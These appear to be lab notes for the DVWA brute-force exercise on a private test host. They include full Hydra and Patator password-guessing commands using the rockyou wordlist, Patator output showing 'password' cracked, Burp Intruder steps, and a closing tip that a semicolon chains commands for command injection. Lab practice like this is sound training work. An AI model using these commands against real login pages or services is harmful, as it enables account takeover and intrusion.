https://www.youtube.com/watch?v=6EbdPO3nPmo
Hydra (failed)
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt "http-get-form://10.1.1.92/vulnerabilities/brute/?:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:PHPSESSID=4h0uedpbegdva5blbjtm85o5iq; security=low" -V -t4
Patador
$ patator http_fuzz url="<http://10.1.1.92/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login>" method=GET header="Cookie:security=low;PHPSESSID=p3tije0mp93ane756j85ar5jbv" 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep="Username and/or password incorrect."
19:23:33 patator INFO - Starting Patator 0.9 (<https://github.com/lanjelot/patator>) with python-3.8.6 at 2020-11-23 19:23 AEST
19:23:34 patator INFO -
19:23:34 patator INFO - code size:clen time | candidate | num | mesg
19:23:34 patator INFO - -----------------------------------------------------------------------------
19:23:34 patator INFO - 200 4547:4275 0.004 | password | 4 | HTTP/1.1 200 OK
Burp Suite
Proxy > Intercept tab
Attempt login with user:password
Proxy > HTTP history tab
Find the GET request for the login attempt
Check the details:
Right click the line, or click Actions, then Send to Intruder
Intruder > Positions tab. Set the payload positions (only attempt username admin
)
Intruder > Payloads tab. Load rockyou.txt
.
Start attack!
Review the results. Look for different status codes or length.
Payload "password" has length 4566.
Check in the browser.
Remotely, find out the user of the web service on the OS, as well as the machines hostname via RCE.
A semicolon can be used to chain multiple commands.